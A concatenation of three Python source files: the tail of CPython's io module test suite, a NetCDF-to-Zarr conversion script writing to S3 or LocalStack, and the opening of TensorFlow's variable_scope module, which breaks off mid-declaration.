self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. 
self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(os_helper.TESTFN, "wb") self._check_warn_on_dealloc(os_helper.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with warnings_helper.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with self.open(os_helper.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. 
For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(os_helper.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(os_helper.TESTFN, 'xb') as f: f.write(b"spam") with self.open(os_helper.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' 
code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. 
code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked 
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. 
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = import_helper.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. 
N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. 
    # Reentrant-write tests are disabled for the pure-Python implementation
    # (overriding the inherited test methods with None removes them).
    test_reentrant_write_buffered = None
    test_reentrant_write_text = None


def load_tests(*args):
    """Build the suite, injecting the C/Python I/O namespaces into each test.

    Tests whose class name starts with "C" get the accelerated `io`
    namespace; tests starting with "Py" get the pure-Python `pyio` one.
    """
    tests = (CIOTest, PyIOTest, APIMismatchTest,
             CBufferedReaderTest, PyBufferedReaderTest,
             CBufferedWriterTest, PyBufferedWriterTest,
             CBufferedRWPairTest, PyBufferedRWPairTest,
             CBufferedRandomTest, PyBufferedRandomTest,
             StatefulIncrementalDecoderTest,
             CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
             CTextIOWrapperTest, PyTextIOWrapperTest,
             CMiscIOTest, PyMiscIOTest,
             CSignalsTest, PySignalsTest,
             )

    # Put the namespaces of the IO module we are testing and some useful mock
    # classes in the __dict__ of each test.
    mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
             MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
             SlowFlushRawIO)
    all_members = io.__all__ + ["IncrementalNewlineDecoder"]
    c_io_ns = {name : getattr(io, name) for name in all_members}
    py_io_ns = {name : getattr(pyio, name) for name in all_members}
    globs = globals()
    # The mock classes are defined twice at module level, prefixed "C"/"Py".
    c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
    py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
    # Avoid turning open into a bound method.
    py_io_ns["open"] = pyio.OpenWrapper
    for test in tests:
        if test.__name__.startswith("C"):
            for name, obj in c_io_ns.items():
                setattr(test, name, obj)
        elif test.__name__.startswith("Py"):
            for name, obj in py_io_ns.items():
                setattr(test, name, obj)

    suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
    return suite

if __name__ == "__main__":
    unittest.main()
convert.py
import collections.abc
import os
import sys
import multiprocessing
from multiprocessing import Semaphore
from typing import Union
import re
import s3fs
import numpy as np
import zarr
from netCDF4 import Dataset

# AWS region used for all S3 access; falls back to us-west-2 when unset.
region = os.environ.get('AWS_DEFAULT_REGION') or 'us-west-2'

# Some global that may be shared by different methods
# NIST binary-prefix multipliers (Ki/Mi/Gi) used by compute_chunksize.
binary_prefix_conversion_map = {"Ki": 1024, "Mi": 1048576, "Gi": 1073741824}


def make_localstack_s3fs():
    """Return an S3FileSystem pointed at a LocalStack endpoint.

    Used for local development/testing; credentials are dummy values
    because LocalStack does not validate them.
    """
    host = os.environ.get('LOCALSTACK_HOST') or 'host.docker.internal'
    return s3fs.S3FileSystem(
        use_ssl=False,
        key='ACCESS_KEY',
        secret='SECRET_KEY',
        client_kwargs=dict(
            region_name=region,
            endpoint_url='http://%s:4572' % (host)))


def make_s3fs():
    """Return an S3FileSystem for the configured AWS region."""
    return s3fs.S3FileSystem(client_kwargs=dict(region_name=region))


def netcdf_to_zarr(src, dst):
    """
    Convert the NetCDF file at src to the zarr file at dst, preserving
    data, metadata, and group hierarchy

    Parameters
    ----------
    src : string | netCDF4.Dataset
        The file to convert, either a location on disk or an
        already-opened dataset
    dst : string | collections.abc.MutableMapping
        The output zarr file.  Either a location on disk into which a
        zarr.DirectoryStore will be written or a MutableMapping into
        which zarr data can be written.
    """
    managed_resources = []
    try:
        # Allow passing in a path to a store or a file; anything we open
        # ourselves is tracked so it gets closed in the finally block.
        if isinstance(src, str):
            src = Dataset(src, 'r')
            managed_resources.append(src)
        if isinstance(dst, str):
            dst = zarr.DirectoryStore(dst)
            managed_resources.append(dst)

        # Read raw (unmasked) values but let netCDF4 apply
        # scale_factor/add_offset, so stored zarr data is already scaled.
        src.set_auto_mask(False)
        src.set_auto_scale(True)
        __copy_group(src, zarr.group(dst, overwrite=True))
        # Consolidate group/array metadata into a single key for fast opens.
        zarr.convenience.consolidate_metadata(dst)
    finally:
        for resource in managed_resources:
            try:
                resource.close()
            except BaseException:
                # Deliberate best-effort cleanup: a close() failure must not
                # mask an error raised by the conversion itself.
                pass


def scale_attribute(src, attr, scale_factor, add_offset):
    """
    Scales an unscaled NetCDF attribute

    Parameters
    ----------
    src : netCDF4.Variable
        the source variable to copy
    attr : collections.abc.Sequence | numpy.ndarray | number
        the NetCDF variable attribute that needs to be scaled
    scale_factor : number
        the number used to multiply unscaled data
    add_offset : number
        the number added to unscaled data after multiplied by scale_factor

    Returns
    -------
    list | number
        the scaled data; either a list of floats or a float scalar
    """
    def scale_fn(x):
        return float(x * scale_factor + add_offset)

    unscaled = getattr(src, attr)
    # collections.Sequence was removed in Python 3.10; the abc module is
    # the supported home for the ABC.
    if isinstance(unscaled, (collections.abc.Sequence, np.ndarray)):
        return [scale_fn(u) for u in unscaled]
    else:
        return scale_fn(unscaled)


def compute_chunksize(shape: Union[tuple, list],
                      datatype: str,
                      compression_ratio: float = 1.5,
                      compressed_chunksize_byte: Union[int, str] = '10 Mi'):
    """
    Compute the chunksize for a given shape and datatype based on the
    compression requirement.  We will try to make it equal along different
    dimensions, without exceeding the given shape boundary.

    Parameters
    ----------
    shape : list/tuple
        the zarr shape
    datatype : str
        the zarr data type which must be recognized by numpy
    compression_ratio : float
        expected compression ratio for each chunk; defaults to 1.5
    compressed_chunksize_byte : int/str
        expected chunk size in bytes after compression.  If it's a string,
        assuming it follows NIST standard for binary prefix
        (https://physics.nist.gov/cuu/Units/binary.html) except that only
        Ki, Mi, and Gi are allowed.  Space is optional between number
        and unit.

    Returns
    -------
    list/tuple
        the regenerated new zarr chunks (same sequence type as `shape`)

    Raises
    ------
    ValueError
        if the size string is malformed or compression_ratio < 1
    """
    # convert compressed_chunksize_byte to integer if it's a str
    if isinstance(compressed_chunksize_byte, str):
        try:
            (value, unit) = re.findall(
                r"^\s*([\d.]+)\s*(Ki|Mi|Gi)\s*$", compressed_chunksize_byte
            )[0]
        except IndexError:
            err_message = """Chunksize needs to be either an integer or string.
            If it's a string, assuming it follows NIST standard for binary prefix
            (https://physics.nist.gov/cuu/Units/binary.html)
            except that only Ki, Mi, and Gi are allowed."""
            raise ValueError(err_message)
        compressed_chunksize_byte = int(float(value)) * int(binary_prefix_conversion_map[unit])

    # get product of chunksize along different dimensions before compression
    if compression_ratio < 1.:
        raise ValueError("Compression ratio < 1 found when estimating chunk size.")
    chunksize_unrolled = int(
        compressed_chunksize_byte * compression_ratio / np.dtype(datatype).itemsize
    )

    # compute the chunksize by trying to make it equal along different
    # dimensions, without exceeding the given shape boundary.  Dimensions
    # smaller than the even split are pinned to their full extent and the
    # remaining budget is redistributed over the rest.
    suggested_chunksize = np.full(len(shape), 0)
    shape_array = np.array(shape)
    dim_to_process = np.full(len(shape), True)
    while not (~dim_to_process).all():
        chunksize_remaining = chunksize_unrolled // suggested_chunksize[~dim_to_process].prod()
        chunksize_oneside = int(pow(chunksize_remaining, 1 / dim_to_process.sum()))
        if (shape_array[dim_to_process] >= chunksize_oneside).all():
            suggested_chunksize[dim_to_process] = chunksize_oneside
            dim_to_process[:] = False
        else:
            dim_to_fill = dim_to_process & (shape_array < chunksize_oneside)
            suggested_chunksize[dim_to_fill] = shape_array[dim_to_fill]
            dim_to_process[dim_to_fill] = False

    # return new chunks in the same sequence type as the input shape
    suggested_chunksize = type(shape)(suggested_chunksize.tolist())
    return suggested_chunksize


def __copy_variable(src, dst_group, name, sema=Semaphore(20)):
    """
    Copies the variable from the NetCDF src variable into the Zarr group
    dst_group, giving it the provided name

    Parameters
    ----------
    src : netCDF4.Variable
        the source variable to copy
    dst_group : zarr.hierarchy.Group
        the group into which to copy the variable
    name : string
        the name of the variable in the destination group
    sema : multiprocessing.synchronize.Semaphore
        Semaphore used to limit concurrent processes
        NOTE: the default (a single module-level Semaphore(20), shared by
        every call that relies on the default) is empirical

    Returns
    -------
    zarr.core.Array
        the copied variable
    """
    # acquire Semaphore; released in the finally block so an exception in a
    # forked child cannot permanently consume a concurrency slot.
    sema.acquire()
    try:
        # connect to s3
        if os.environ.get('USE_LOCALSTACK') == 'true':
            s3 = make_localstack_s3fs()
        else:
            s3 = make_s3fs()

        # NOTE(review): output always goes through an S3 mapper built from
        # dst_group.store.root, even when netcdf_to_zarr was given a local
        # DirectoryStore — confirm this is intentional.
        group_name = os.path.join(dst_group.store.root, dst_group.path)
        dst = s3.get_mapper(root=group_name, check=False, create=True)
        dst_group = zarr.group(dst)

        # create zarr group/dataset
        chunks = src.chunking()
        if chunks == 'contiguous' or chunks is None:
            chunks = src.shape
        if not chunks and len(src.dimensions) == 0:
            # Treat a 0-dimensional NetCDF variable as a zarr group
            dst = dst_group.create_group(name)
        else:
            # With auto-scaling on, scaled reads come back in the dtype of
            # scale_factor/add_offset, so prefer those dtypes when present.
            dtype = src.dtype
            dtype = src.scale_factor.dtype if hasattr(src, 'scale_factor') else dtype
            dtype = src.add_offset.dtype if hasattr(src, 'add_offset') else dtype
            new_chunks = compute_chunksize(src.shape, dtype)
            dst = dst_group.create_dataset(name,
                                           data=src,
                                           shape=src.shape,
                                           chunks=tuple(new_chunks),
                                           dtype=dtype)

        # Apply scale factor and offset to attributes that are not
        # automatically scaled by NetCDF
        scaled = {}
        scale_factor = getattr(src, 'scale_factor', 1.0)
        add_offset = getattr(src, 'add_offset', 0.0)
        if scale_factor != 1.0 or add_offset != 0.0:
            unscaled_attributes = ['valid_range', 'valid_min', 'valid_max',
                                   '_FillValue', 'missing_value']
            present_attributes = [attr for attr in unscaled_attributes if hasattr(src, attr)]
            scaled = {attr: scale_attribute(src, attr, scale_factor, add_offset)
                      for attr in present_attributes}

        # xarray requires the _ARRAY_DIMENSIONS metadata to know how to label axes
        __copy_attrs(src, dst, scaled, _ARRAY_DIMENSIONS=list(src.dimensions))

        return dst
    finally:
        # release Semaphore
        sema.release()


def __copy_attrs(src, dst, scaled=None, **kwargs):
    """
    Copies all attributes from the source group or variable into the
    destination group or variable.  Converts netCDF4 variable values from
    their native type (typically Numpy dtypes) into JSON-serializable
    values that Zarr can store

    Parameters
    ----------
    src : netCDF4.Group | netCDF4.Variable
        The source from which to copy attributes
    dst : zarr.hierarchy.Group | zarr.core.Array
        The destination into which to copy attributes.
    scaled : dict | None
        Attribute overrides that have already had scale/offset applied;
        defaults to no overrides.
    **kwargs : dict
        Additional attributes to add to the destination
    """
    # Avoid a mutable default argument; None stands in for "no overrides".
    if scaled is None:
        scaled = {}
    attrs = {key: __netcdf_attr_to_python(getattr(src, key)) for key in src.ncattrs()}
    attrs.update(kwargs)
    attrs.update(scaled)
    # scale/offset were already applied to the data, so dropping them here
    # prevents readers from applying them a second time.
    attrs.pop('scale_factor', None)
    attrs.pop('add_offset', None)
    dst.attrs.put(attrs)


def __copy_group(src, dst):
    """
    Recursively copies the source netCDF4 group into the destination Zarr
    group, along with all sub-groups, variables, and attributes

    NOTE: the variables will be copied in parallel processes via
    multiprocessing; 'fork' is used as the start-method because
    OSX/Windows is using 'spawn' by default, which will introduce overhead
    and difficulties pickling data objects (and to the test); Semaphore is
    used to limit the number of concurrent processes, which is set to
    double the number of cpu-s found on the host

    Parameters
    ----------
    src : netCDF4.Group
        the NetCDF group to copy from
    dst : zarr.hierarchy.Group
        the existing Zarr group to copy into
    """
    __copy_attrs(src, dst)

    for name, item in src.groups.items():
        __copy_group(item, dst.create_group(name.split('/').pop()))

    procs = []
    fork_ctx = multiprocessing.get_context('fork')
    sema = Semaphore(multiprocessing.cpu_count() * 2)
    for name, item in src.variables.items():
        proc = fork_ctx.Process(target=__copy_variable, args=(item, dst, name, sema))
        proc.start()
        procs.append(proc)
    for proc in procs:
        proc.join()


def __netcdf_attr_to_python(val):
    """
    Given an attribute value read from a NetCDF file (typically a numpy
    type), returns the value as a Python primitive type, e.g.
    np.integer -> int.  Returns the value unaltered if it does not need
    conversion or is unrecognized

    Parameters
    ----------
    val : any
        An attribute value read from a NetCDF file

    Returns
    -------
    any
        The converted value
    """
    if isinstance(val, np.integer):
        return int(val)
    elif isinstance(val, np.floating):
        return float(val)
    elif isinstance(val, np.ndarray):
        return [__netcdf_attr_to_python(v) for v in val.tolist()]
    elif isinstance(val, bytes):
        # Assumes bytes are UTF-8 strings.  This holds for attributes.
        return val.decode("utf-8")
    return val


if __name__ == '__main__':
    netcdf_to_zarr(sys.argv[1], sys.argv[2])
variable_scope.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """A class to store named variables and a scope operator to manage sharing.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections as collections_lib import copy import enum # pylint: disable=g-bad-import-order import functools import sys import threading import traceback import six from six import iteritems from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.python.eager import context from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.ops import array_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import resource_variable_ops from tensorflow.python.ops import variables from tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import deprecation from tensorflow.python.util import function_utils from tensorflow.python.util import tf_contextlib from tensorflow.python.util import tf_inspect from tensorflow.python.util.tf_export import tf_export __all__ = [ "AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable", "get_local_variable", "variable_scope", "variable_op_scope", "no_regularizer", 
"VariableSynchronization", "VariableAggregation" ] class _PartitionInfo(object): """Holds partition info used by initializer functions. """ def __init__(self, full_shape, var_offset): """Constructor. Args: full_shape: Tuple or list of `int` indicating the full combined shape of the partitioned variables. var_offset: Tuple or list of `int` specifying offset of this partition with respect to the full variable for each dimension. Raises: TypeError: If `full_shape` or `var_offset` is not a sequence. ValueError: If `full_shape` or `var_offset` differ in length. If `var_offset` exceeds `full_shape` in any dimension. """ if not isinstance(full_shape, collections_lib.Sequence) or isinstance( full_shape, six.string_types): raise TypeError( "`full_shape` must be a sequence (like tuple or list) instead of " + type(full_shape).__name__) if not isinstance(var_offset, collections_lib.Sequence) or isinstance( var_offset, six.string_types): raise TypeError( "`var_offset` must be a sequence (like tuple or list) instead of " + type(var_offset).__name__) if len(var_offset) != len(full_shape): raise ValueError( "Expected equal length, but `var_offset` is of length {} while " "full_shape is of length {}.".format( len(var_offset), len(full_shape))) for i in xrange(len(full_shape)): offset = var_offset[i] shape = full_shape[i] if offset < 0 or offset >= shape: raise ValueError( "Expected 0 <= offset < shape but found offset={}, shape={} for " "var_offset={}, full_shape={}".format(offset, shape, var_offset, full_shape)) self._full_shape = full_shape self._var_offset = var_offset @property def full_shape(self): return self._full_shape @property def var_offset(self): return self._var_offset def single_offset(self, shape): """Returns the offset when the variable is partitioned in at most one dim. Args: shape: Tuple or list of `int` indicating the shape of one specific variable partition. Returns: `int` representing the offset in the dimension along which the variable is partitioned. 
Returns 0 if the variable is not being partitioned. Raises: ValueError: Depending on self.single_slice_dim(). """ single_slice_dim = self.single_slice_dim(shape) # If this variable is not being partitioned at all, single_slice_dim() could # return None. if single_slice_dim is None: return 0 return self.var_offset[single_slice_dim] def single_slice_dim(self, shape): """Returns the slice dim when the variable is partitioned only in one dim. Args: shape: Tuple or list of `int` indicating the shape of one specific variable partition. Returns: `int` representing the dimension that the variable is partitioned in, or `None` if the variable doesn't seem to be partitioned at all. Raises: TypeError: If `shape` is not a sequence. ValueError: If `shape` is not the same length as `self.full_shape`. If the variable is partitioned in more than one dimension. """ if not isinstance(shape, collections_lib.Sequence) or isinstance( shape, six.string_types): raise TypeError( "`shape` must be a sequence (like tuple or list) instead of " + type(shape).__name__) if len(shape) != len(self.full_shape): raise ValueError( "Expected equal length, but received shape={} of length {} while " "self.full_shape={} is of length {}.".format(shape, len( shape), self.full_shape, len(self.full_shape))) for i in xrange(len(shape)): if self.var_offset[i] + shape[i] > self.full_shape[i]: raise ValueError( "With self.var_offset={}, a partition of shape={} would exceed " "self.full_shape={} in dimension {}.".format( self.var_offset, shape, self.full_shape, i)) slice_dim = None for i in xrange(len(shape)): if shape[i] == self.full_shape[i]: continue if slice_dim is not None: raise ValueError( "Cannot use single_slice_dim() with shape={} and " "self.full_shape={} since slice dim could be either dimension {} " "or {}.".format(shape, self.full_shape, i, slice_dim)) slice_dim = i return slice_dim class _ReuseMode(enum.Enum): """Mode for variable access within a variable scope.""" # Indicates that variables are to 
be fetched if they already exist or # otherwise created. AUTO_REUSE = 1 # TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of # enum values. # REUSE_FALSE = 2 # REUSE_TRUE = 3 # TODO(apassos) remove these forwarding symbols. VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name AUTO_REUSE = _ReuseMode.AUTO_REUSE tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE") AUTO_REUSE.__doc__ = """ When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that get_variable() should create the requested variable if it doesn't exist or, if it does exist, simply return it. """ _DEFAULT_USE_RESOURCE = False @tf_export(v1=["enable_resource_variables"]) def enable_resource_variables(): """Creates resource variables by default. Resource variables are improved versions of TensorFlow variables with a well-defined memory model. Accessing a resource variable reads its value, and all ops which access a specific read value of the variable are guaranteed to see the same value for that tensor. Writes which happen after a read (by having a control or data dependency on the read) are guaranteed not to affect the value of the read tensor, and similarly writes which happen before a read are guaranteed to affect the value. No guarantees are made about unordered read/write pairs. Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0 feature. """ global _DEFAULT_USE_RESOURCE _DEFAULT_USE_RESOURCE = True @deprecation.deprecated( None, 